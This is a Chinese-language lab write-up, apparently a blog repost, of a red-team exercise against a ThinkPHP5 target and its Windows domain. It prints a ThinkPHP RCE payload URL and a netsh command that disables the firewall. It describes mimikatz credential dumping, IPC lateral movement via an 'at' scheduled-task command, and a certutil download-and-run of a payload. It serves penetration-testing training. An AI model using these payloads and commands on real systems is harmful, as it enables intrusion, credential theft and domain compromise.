ATTCK红队评估(五)

2024-06-09 20:04
文章标签 评估 红队 attck

本文主要是介绍ATTCK红队评估(五),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

环境搭建

靶场拓扑图:

靶机下载地址: 漏洞详情

外网信息收集

确定目标靶机地址:

发现主机192.168.135.150主机是本次攻击的目标地址。探测靶机开放的端口信息:

目标靶机开放了两个端口:80、3306,那没什么意外的话就是 web服务和mysql服务

目标靶机开放了80端口,中间件是Apache 3306是mysql服务,系统是windows系统。

默认漏洞脚本的探测结果,除了几个存在的敏感路径之外,似乎看不到什么信息。

看到了两个端口,先看看3306端口吧:是不是存在弱口令等信息:

发现存在白名单,不允许我们连接。

ThinkPHP5 RCE

80端口上是thinkphp的框架,版本是v5:

没有路由信息,接下来做一个目录扫描,看看有什么目录泄露出来:

这里做了递归扫描!看到了几个文件add.php文件,这个文件应该不是thinkphp默认搭建成功存在的文件。还有git信息的泄露!

先看下robots文件中是不是给出了相关的敏感路径:

robots文件中没有什么路径。看一下add文件:

看来是存在waf了,需要进行bypass。这个页面的左上角还存在一个GIF89a,尝试输入下,然后抓包看看数据包中的信息:

这里我最开始先去用ThinkPHP的漏洞检测工具,进行了检测,发现存在RCE。

http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

另一个payload:

thinkphp5 5.0.22/5.1.29远程代码执行漏洞_thinkphp v5.0.22-CSDN博客

找到了一篇文章,直接写马进去:

返回了29,尝试访问写的马:

没问题,成功执行代码,连接蚁剑:

蚁剑连接成功!

administrator权限!

上线CS

先看看防火墙,杀毒软件等信息的开启状态:

netsh advfirewall show allprofile state

可以看到防火墙全部开启的状态,由于我们现在的权限还是很高的,直接关闭。当然也可以尝试正向链接。

netsh advfirewall set allprofile state off #关闭防火墙命令

接下来再看看杀软的信息:

tasklist /svc

似乎没有杀软存在,那就可以直接生成CS的反向🐎,上线CS了:

CS配置监听器:

上传马:

执行等待上线:

CS上线成功:

内网信息收集

可以看到存在两个网卡!192.168.138.0/24是另一张网卡!

使用mimikatz,拿到了明文的账号密码信息。存在域环境!

查看域内成员信息,发现了存在leo、admin用户。

域控就是administrator~

这里先去搭建了socks代理。

查看arp缓存表,发现了192.168.138.138主机存活:

确定主机之间能够通信,然后探测端口号:

看到192.168.138.138主机开放的端口比较多。利用上面的socks代理,先看看88端口上是不是存在web服务:

横向上线DC

但是一直访问不到。由于目标主机开放了139端口,似乎没有开放445端口。这里尝试一下利用IPC进行横向移动。

建立IPC链接!尝试访问192.168.138.138主机的共享C盘:

将正向马传至控下来的web主机:

利用copy命令,将他上传到192.168.138.138主机上:

查看到已经上传上去了!利用定时任务尝试执行木马文件。

这里使用了at和schtasks命令先测试了一下 192.168.138.138系统的版本信息:

at命令是 适用于windows 2012之前的操作系统
schtasks命令适用于windows 2012之后(包括windows 2012)操作系统

判断了一下,发现目标的机器是windows 2012之前的系统,它不支持schtasks命令。那么接下来我们就创建一个计划任务,然后等待执行,上线:

利用 net time 判断了当前的时间
然后根据当前的时间信息,创建一个定时任务
at \\192.168.138.138 0:07 c:\3333.exe

当时间到了0:07的时候,程序被执行,由于我们生成的马是正向的马,所以尝试使用connect 进行连接。

但是发现主机并没有上线。

确定一下木马文件没有被杀软等ban掉:

木马确实还在,但是无法上线,怀疑是防火墙规则,建立了入站规则,导致我们无法上线。换成反向马,再试试,反向马需要做转发上线。

建立转发上线的监听器:

继续将木马文件上传到外网主机上面:

再次利用copy命令复制文件:

上传上去之后,再次创建计划任务,尝试上线:

但是似乎还是无法上线。很奇怪。利用impacket包的atexec尝试进行命令执行:GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols. (impacket包下载地址)

正常能执行命令。权限还是system权限。那就尝试再次下载文件:

certutil.exe -urlcache -split -f http://192.168.138.136:80/6666.exe fx.exe

下载成功之后,文件会在C:\Windows\System32 目录下面保存:

利用共享目录查看一下是不是存在了:

没问题,下载成功!接下来再次利用脚本执行命令:

发现CS上成功上线了主机:

看一下,防火墙的状态:

防火墙全开了。应该也没有什么杀软,不然马都被杀了。

开启3389端口

关了防火墙,尝试远程上去,利用mimikatz获取到了明文的密码:

利用账号密码,同时和隧道:

rdesktop进行远程连接!

这篇关于ATTCK红队评估(五)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1046165

相关文章

PR曲线——一个更敏感的性能评估工具

在不均衡数据集的情况下,精确率-召回率(Precision-Recall, PR)曲线是一种非常有用的工具,因为它提供了比传统的ROC曲线更准确的性能评估。以下是PR曲线在不均衡数据情况下的一些作用: 关注少数类:在不均衡数据集中,少数类的样本数量远少于多数类。PR曲线通过关注少数类(通常是正类)的性能来弥补这一点,因为它直接评估模型在识别正类方面的能力。 精确率与召回率的平衡:精确率(Pr

安卓开发板_联发科MTK开发评估套件串口调试

串口调试 如果正在进行lk(little kernel ) 或内核开发,USB 串口适配器( USB 转串口 TTL 适配器的简称)对于检查系统启动日志非常有用,特别是在没有图形桌面显示的情况下。 1.选购适配器 常用的许多 USB 转串口的适配器,按芯片来分,有以下几种: CH340PL2303CP2104FT232 一般来说,采用 CH340 芯片的适配器,性能比较稳定,价

随着人们网络安全意识提高,软件架构设计与评估也成为重中之重

目录 案例 【题目】 【问题 1】(13 分) 【问题 2】(12分) 【答案】 【问题 1】答案 【问题 2】答案 相关推荐 案例         阅读以下关于软件架构设计与评估的叙述,回答问题 1 和问题 2。 【题目】         某电子商务公司为正更好地管理用户,提升企业销售业绩,拟开发一套用户管理系统。该系统的基本功能是根据用户的消费级别、消费历史、信

基于yolov8的包装盒纸板破损缺陷测系统python源码+onnx模型+评估指标曲线+精美GUI界面

【算法介绍】 基于YOLOv8的包装盒纸板破损缺陷检测系统是一种高效、智能的解决方案,旨在提高生产线上包装盒纸板的质量检测效率与准确性。该系统利用YOLOv8这一前沿的深度学习模型,通过其强大的目标检测能力,能够实时识别并标记出包装盒纸板上的各种破损缺陷,如划痕、撕裂、孔洞等。 在系统中,首先需对包含破损缺陷的包装盒纸板图像进行数据采集和标注,形成训练数据集。随后,利用这些数据进行模型训练,使

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

数据安全评估工程师CCRC-DSA怎么考?

数据安全评估工程师的职责涉及对数据安全风险进行专业评估。 他们通过深入分析企业的数据资产,识别潜在风险,并设计相应的防范措施。 此岗位要求从业者具备深厚的计算机科学与网络安全专业知识以及丰富的实践经历。 对于想要成为数据安全评估工程师的人来说,基本条件包括:1. 教育背景:通常需要本科以上学历,以计算机科学、信息安全或网络工程等相关专业为佳。 2. 技能水平:必须掌握操作系统、数据库、

基于yolov8的NEU-DET钢材缺陷检测系统python源码+onnx模型+评估指标曲线+精美GUI界面

【算法介绍】 基于YOLOv8的NEU-DET钢材缺陷检测系统是一种创新的解决方案,旨在通过深度学习技术实现对钢材表面缺陷的自动检测和识别。该系统利用YOLOv8算法,该算法以其高效、准确和实时检测的特点著称。 NEU-DET数据集为该系统提供了丰富的训练资源,涵盖了热轧带钢的六种典型表面缺陷,包括轧制氧化皮、斑块、开裂、点蚀表面、内含物和划痕,每种缺陷均有大量样本,确保了模型的全面性和准确性

IMU腕带评估轮椅用户运动健康

近期,美国的研究团队利用惯性测量单元(IMU)和机器学习来准确评估手动轮椅使用者的运动健康状况,这在康复训练和慢性病管理领域具有广阔的应用前景。 研究小组将运用高性能的IMU传感器固定到轮椅使用者佩戴的手腕带上,用来监测并记录轮椅推进过程中的运动数据。实验设置了不同强度的六分钟推力测试,结果证实仅使用IMU传感器就能准确捕捉到轮椅使用者的速度、距离和节奏变化,为心血管健康评估提供

基于yolov8的电动车佩戴头盔检测系统python源码+onnx模型+评估指标曲线+精美GUI界面

【算法介绍】 基于YOLOv8的电动车佩戴头盔检测系统利用了YOLOv8这一先进的目标检测模型,旨在提高电动车骑行者的安全意识,减少因未佩戴头盔而导致的交通事故风险。YOLOv8作为YOLO系列的最新版本,在检测速度和精度上均进行了优化,特别适用于处理复杂场景中的小目标检测。 该系统通过收集并标注包含电动车骑行者图像的数据集,对YOLOv8模型进行训练,使其能够准确识别骑行者是否佩戴头盔。在实

基于yolov8的西红柿缺陷检测系统python源码+onnx模型+评估指标曲线+精美GUI界面

【算法介绍】 基于YOLOv8的西红柿缺陷检测系统是一个利用深度学习技术的创新项目,旨在通过自动化和智能化的方式提高西红柿缺陷检测的准确性和效率。该系统利用YOLOv8目标检测算法,该算法以其高效性和准确性在目标检测领域表现出色。YOLOv8不仅继承了YOLO系列模型的优势,还引入了新的骨干网络、Anchor-Free检测头以及优化后的损失函数,这些改进使得模型在复杂环境下的检测性能更加优越。